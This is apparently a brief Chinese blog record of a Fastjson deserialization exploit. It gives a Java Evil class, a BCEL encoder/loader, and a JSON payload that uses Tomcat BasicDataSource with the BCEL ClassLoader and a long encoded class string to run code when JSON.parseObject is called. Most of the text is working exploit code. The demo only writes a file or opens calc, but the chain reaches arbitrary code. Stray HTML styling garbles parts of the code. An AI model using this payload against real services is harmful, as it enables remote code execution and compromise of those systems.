image

只是做个记录

Evil.java

import java.io.File;
import java.io.FileNotFoundException;
import java.io.FileOutputStream;
import java.io.IOException;

public class Evil {
// static {
// try {
// Runtime.getRuntime().exec(“calc.exe”);
// } catch (Exception e) {
// e.printStackTrace();
// }
// }
static {

<span style="color: rgba(0, 128, 0, 1)">//win系统</span>
    String path = "<span style="color: rgba(139, 0, 0, 1)">D:\\hello.txt</span>";
File file = <span style="color: rgba(0, 0, 255, 1)">new</span> File(path);

String content = "<span style="color: rgba(139, 0, 0, 1)">hello,world.\n</span>";
FileOutputStream fileOutputStream = <span style="color: rgba(0, 0, 255, 1)">null</span>;
<span style="color: rgba(0, 0, 255, 1)">try</span> {
    fileOutputStream = <span style="color: rgba(0, 0, 255, 1)">new</span> FileOutputStream(file);
} <span style="color: rgba(0, 0, 255, 1)">catch</span> (FileNotFoundException e) {
    e.printStackTrace();
}
<span style="color: rgba(0, 0, 255, 1)">try</span> {
    fileOutputStream.write(content.getBytes());
} <span style="color: rgba(0, 0, 255, 1)">catch</span> (IOException e) {
    e.printStackTrace();
}

<span style="color: rgba(0, 0, 255, 1)">try</span> {
    fileOutputStream.close();
} <span style="color: rgba(0, 0, 255, 1)">catch</span> (IOException e) {
    e.printStackTrace();
}

}
}

BCEL.java

import com.sun.org.apache.bcel.internal.Repository;
import com.sun.org.apache.bcel.internal.classfile.JavaClass;
import com.sun.org.apache.bcel.internal.classfile.Utility;
import com.sun.org.apache.bcel.internal.util.ClassLoader;

import java.io.IOException;

public class BCEL {
public static void main(String[] args) throws IOException, ClassNotFoundException, IllegalAccessException, InstantiationException {
JavaClass cls = Repository.lookupClass(Evil.class);
String code = Utility.encode(cls.getBytes(),true);
System.out.println(“$$BCEL$$“+code);
// 加载类并实例化
new ClassLoader().loadClass(“$$BCEL$$“+code).newInstance();
}
}

执行BCEL.java

image


FastjsonTest.java  将上述生成BCEL带入payload

import com.alibaba.fastjson.JSON;

public class FastjsonTest {
public static void main(String[] args) {
String payload =
{\n
+ “ {\n
+ “ "aaa": {\n
+ “ "@type": "org.apache.tomcat.dbcp.dbcp2.BasicDataSource",\n
+ “ "driverClassLoader": {\n
+ “ "@type": "com.sun.org.apache.bcel.internal.util.ClassLoader"\n
+ “ },\n
+ “ "driverClassName": "$$BCEL$$$l$8b$I$A$A$A$A$A$A$A$7dS$d9R$TA$U$3dM$s$990$O$86$EQ$W$RQ$96$EB$o$m$88$ac$ca$92r$J$f0$AE$V$85$$c30$92$c1$c9L$w$e9$m$7c$91$cf$bc$40$95T$f9$B$7e$94xz$40$96B$9d$87$5e$ce$3d$e7$de$db$a7$7b$7e$fe$fa$fe$D$c0K$y$Zh$c6P$iY$j$c3$G$o$c8$c5$91$d7$f1$c2$40$M$p$3aF$N$c41f$907$ae$90$J$j$af$M$98$K$89aR$c7k$jS$C$b1$Z$d7w$e5$9c$40$q$9d$d9$U$d0$W$83$5dG$mQt$7dg$b5$5e$deq$aa$h$d6$8eG$qU$Ml$cb$db$b4$aa$ae$da$82$9a$y$b95$81$96$a2$j$94$f3$b5z$c5$a9$96$z$3f$bf$7c$e0z$d3$C$f1$Z$db$bb$cc$z$c8$ed$$$ee$5b$HV$de$N$f2$F$d7sV$DY$I$ea$fe$ee$f2$a1$edT$a4$h$f8$U$b4$5e1$de$af$dd$c4$b5$8a$rK$aa$830$ecY$fe$5e$7e$5dV$5d$7fO$c5$3e$bb$aa$91$fb$b7$92$T$d7$ed$c0$97$8e$$F$9a$Vc$ad$$$xuI$95c$95$F$3an$b1o$c6$a8lZ$97$96$fde$c5$aa$84g$d41Mo$e9$v$ed$a4$7f$C$c6zP$af$daN$n$y$db$a8$8e$9aS$c9L$q$91$S0$97$a6$3e$95$i$cf$Lr$f2$90$b5$cd$9bu$UeF$m$Z$c6$b3$b5$92$V$f8$96$7b$e4$e6$M$81$b6$7f$f5$a34$b3$C$5d$ff$b5$ce$c4$iRl$d4$c4$3c$de$98x$8b$F$5e$c9$ac4$b1$a8zL$de$b9$y$9atm$ed$da$ce$bec$cb$5b$d0$85$db$bc$a0$f4$dd$xP$8f$s$99$bem$bf$c2$S$V$86e$e8$e5F$d5$b2iV$7c$cf$91$LG$d2$e1$83$d1$d2$99m6$Z$fdZu$r$p$d1$f4$f6$82$d2Dm$$a89$e8A$82$cfZ$7d$N$Q$caW$8e$z$dc$e59$L$ce$d1$c1S$88$e30$fc$80c$y$E$e3h$e5h$5e$Q$f0$Q$8fB$ac$ed$8fX$8c$f2$f7$88$S$5bN5$7c$3cCd$8b9$b4b$w$ba$oV$cf$Q$db$g$3a$85$be$fa$N$c6$94$d6$ae$9d$a0q8$7b$C$e3$E$f7$ae$90$a6$e1$T$dc$bf$de$j3Y$S$j$e8b$89$5ed$d9$99$89$JLa$96s$ql$aa$c08XX$edL$b6$93$60CI$b4S$f3$98$aa$Ot$a3$93$ca$t$d4$f6P$dd$8d$R$3ce$86$5e$e6$Y$60$96$3e$ded$3f$96$90$J$P$f5$O$3a$Z$d1P$ad$91$a9V$9d$5c$cd$ad$o$bct$95W$Z0$c9$ac$dd$3ct$C$e3$cc$d9E$93$92$Yc$95gd$3d$t$p$83$d89aMG$af$8e$bep$ec$87$d01$Q$fb$a0$p$j$xp8$a7$a7$ea$T$q$x$97$H$7f$D$5e$f56fq$E$A$A"\n
+ “ }\n
+ “ }:"xxx"\n
+ “}“;
JSON.parseObject(payload);
}
}